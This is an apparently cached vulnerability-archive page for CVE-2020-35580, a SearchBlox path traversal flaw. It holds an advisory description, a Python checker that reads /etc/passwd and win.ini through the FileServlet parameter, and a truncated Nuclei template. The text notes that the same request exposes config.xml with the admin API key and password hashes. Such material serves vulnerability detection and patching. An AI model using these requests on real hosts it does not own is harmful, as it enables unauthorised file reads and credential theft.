
CVE-2020-35580 PoC — SearchBlox Path Traversal Vulnerability

Source
Associated Vulnerability
Title: SearchBlox Path Traversal Vulnerability (CVE-2020-35580)
Description: SearchBlox is an application from the US company SearchBlox that provides an enterprise search architecture for on-premises or cloud deployment. SearchBlox versions prior to 9.2.2 contain a vulnerability that allows a remote, unauthenticated user to read arbitrary files from the operating system via /searchblox/servlet/FileServlet?col=url=.
Description
SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. The same request can also be used to read the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which hands an attacker the Super Admin API key and the base64-encoded SHA1 password hashes of the other SearchBlox users. Note that no authentication, session or CSRF token is required, so any host that can reach the servlet can perform the read.
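The following checker is an added example for this page; it is neither the cached Nuclei template nor any SearchBlox code. It assumes (none of this is stated on the page) that the file to read is appended directly after `col=url=`, that a Unix host returns `/etc/passwd` with a `root:x:0:0` line and a Windows host returns `win.ini` containing `[fonts]`, and that the base URL passed on the command line points at the SearchBlox web root. The HTTP fetcher is injectable so the verdict logic can be exercised against a constructed response without a live target.

```python
"""Unauthenticated file-read check for the SearchBlox FileServlet issue
(CVE-2020-35580). Added example, not the page's PoC and not SearchBlox code."""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# Endpoint and parameter shape exactly as given in the advisory text.
VULN_PATH = "/searchblox/servlet/FileServlet"

# Probe files and the marker that proves the read returned real content.
# Assumed probe list; the advisory only says "arbitrary files".
PROBES = [
    ("/etc/passwd", re.compile(r"^root:[^:]*:0:0:", re.M)),
    ("C:/Windows/win.ini", re.compile(r"^\[fonts\]", re.M | re.I)),
]


def build_probe_url(base_url: str, target_file: str) -> str:
    """Return <base>/searchblox/servlet/FileServlet?col=url=<target_file>.

    The second '=' is left literal on purpose: the advisory shows the
    parameter as `col=url=`, so the path is the value after that prefix
    (assumed; only '/' and ':' are kept unencoded in the path itself)."""
    base = base_url.rstrip("/")
    quoted = urllib.parse.quote(target_file, safe="/:")
    return f"{base}{VULN_PATH}?col=url={quoted}"


def classify_response(status: int, body: str, marker: re.Pattern) -> str:
    """'vulnerable' if a 200 body carries the marker, 'not_vulnerable' if a
    200 body does not, 'inconclusive' for any other status (404, 500, ...)."""
    if status != 200:
        return "inconclusive"
    return "vulnerable" if marker.search(body) else "not_vulnerable"


def fetch(url: str, timeout: float = 10.0) -> tuple[int, str]:
    """Plain GET; returns (status, first 64 KiB of body). HTTP errors are
    returned as their status, network errors as status 0."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2020-35580-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read(65536).decode("utf-8", "replace")
    except urllib.error.URLError:
        return 0, ""


def check_host(base_url: str, fetcher=fetch) -> dict[str, str]:
    """Run every probe against base_url and map probe path -> verdict."""
    results = {}
    for target_file, marker in PROBES:
        status, body = fetcher(build_probe_url(base_url, target_file))
        results[target_file] = classify_response(status, body, marker)
    return results


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://host:port")
    for path, verdict in check_host(sys.argv[1]).items():
        print(f"{path:22} {verdict}")
    # Any 'vulnerable' line means the host is affected; a fixed 9.2.2+ install
    # should return 'not_vulnerable' or 'inconclusive' for every probe.
```

Run it as `python check.py http://target:8080`; a single `vulnerable` verdict is sufficient, since the same request with `searchblox/WEB-INF/config.xml` as the path would then expose the API key and password hashes described above.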
File Snapshot

id: CVE-2020-35580
info:
  name: SearchBlox <9.2.2 - Local File Inclusion
  author: daffainfo
  sev ...
Shenlong Bot has cached this for you
Remarks
    1. Please use the original source first.
    2. If the original source is unavailable, email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the PoC code for you. To support long-term maintenance, please consider donating. Thank you for your support.